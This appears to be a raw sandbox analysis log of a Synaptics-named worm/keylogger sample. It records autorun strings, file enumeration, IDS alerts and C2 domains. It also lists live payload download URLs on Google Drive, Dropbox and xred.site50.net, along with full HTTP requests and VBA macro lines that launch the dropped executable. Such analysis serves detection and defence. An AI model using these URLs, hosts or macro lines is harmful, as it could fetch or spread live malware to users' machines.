Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfcm140.dll

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Windows\System32\msiexec.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: file.exe, 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: file.exe, 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: file.exe, 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: file.exe	Binary or memory string: [autorun]
Source: file.exe	Binary or memory string: [autorun]
Source: file.exe	Binary or memory string: autorun.inf
Source: ~$cache1.4.dr	Binary or memory string: [autorun]
Source: ~$cache1.4.dr	Binary or memory string: [autorun]
Source: ~$cache1.4.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_00804315 FindFirstFileW,FindClose,	2_2_00804315
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007D993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_007D993E
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F7A87 FindFirstFileExW,	2_2_007F7A87
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007C3BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_007C3BC3
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E84315 FindFirstFileW,FindClose,	3_2_00E84315
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E5993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	3_2_00E5993E
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E43BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	3_2_00E43BC3
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E77A87 FindFirstFileExW,	3_2_00E77A87
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD565CB FindFirstFileW,FindClose,	3_2_6CD565CB
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD66C8C FindFirstFileExA,	3_2_6CD66C8C
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C54315 FindFirstFileW,FindClose,	8_2_00C54315
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C2993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	8_2_00C2993E
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C13BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	8_2_00C13BC3
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C47A87 FindFirstFileExW,	8_2_00C47A87
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00754315 FindFirstFileW,FindClose,	18_2_00754315
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0072993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	18_2_0072993E
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00747A87 FindFirstFileExW,	18_2_00747A87
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00713BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	18_2_00713BC3
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E565CB FindFirstFileW,FindClose,	20_2_62E565CB
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E66C8C FindFirstFileExA,	20_2_62E66C8C

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: excel.exe

Memory has grown: Private usage: 2MB later: 69MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.6:49755 -> 69.42.215.252:80
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49998 -> 142.250.186.78:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: Joe Sandbox View

IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7YhJgTiXXbMA8FMjXFegLjJAKlFg3PYhgnIZXtegTJzztXLTjhiybMLhm4S0MaousiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:42:48 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-rw0VJBBeYHcFRZdPej5R6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=jSQVOxxIP5xjIHNcdh0OjjqByDxmO1yLRWK-PA2Dkmw4BSOGzUov0QhxV9h_10-O4EnomrDII663AgVvqsFtNp6NXVS8l4XLU-0Lueq0A3UwyrIaSjIgP5ssLlv1ovtKtV9_yAj-Xzz4VyXA2x4efgakXVPvI-vMP32rD00BBrYS3_CCzv7GyiQ; expires=Fri, 04-Jul-2025 19:42:48 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77MplH4aBRgr_IDfWpREnOsrK1XJsXmZet_X5bB0aSbJhl913xILINhIz8f2oIeUCJiBKBjgQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:42:51 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dXYYmS1M07mUAkeew5mtrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6HAwgtSv0Ups-kJhs1AZioBtjsqqehsFUDnFiYMyIqyL4ay_iU7h5piz5H6u_beUvbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:42:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-T__uklnHHoMHhB9QleTc-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: VC_redist.x86.exe	String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: file.exe, ._cache_file.exe.0.dr, VC_redist.x86.exe.8.dr, VC_redist.x86.exe.3.dr, ._cache_file.exe.2.dr	String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: ~$cache1.4.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978W
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978f
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978t
Source: VC_redist.x86.exe, 00000014.00000002.4000297478.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, thm.xml.20.dr	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
Source: ~$cache1.4.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: ~$cache1.4.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: ~$cache1.4.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rard
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.3994431866.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/tificate
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: ~$cache1.4.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: ~$cache1.4.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000004.00000003.2876832599.0000000000726000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2888136026.0000000000727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download);#z
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000004.00000003.2876832599.0000000000731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWindows
Source: Synaptics.exe, 00000004.00000003.2899735403.0000000000727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.3994431866.0000000000727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw;
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: ~$cache1.4.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/v
Source: Synaptics.exe, 00000004.00000002.3994431866.0000000000727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.3994431866.0000000000702000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2899735403.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2865366304.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2888136026.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2876832599.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2853997156.000000000070B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000004.00000002.3994431866.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000004.00000003.2899735403.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2888136026.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000004.00000002.3994431866.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2899735403.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2865366304.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2888136026.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2876832599.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgW
Source: Synaptics.exe, 00000004.00000002.3994431866.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2899735403.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2888136026.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyiQ/V
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: ~$cache1.4.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: ~$cache1.4.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlT
Source: ~$cache1.4.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.6:50004 version: TLS 1.2

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
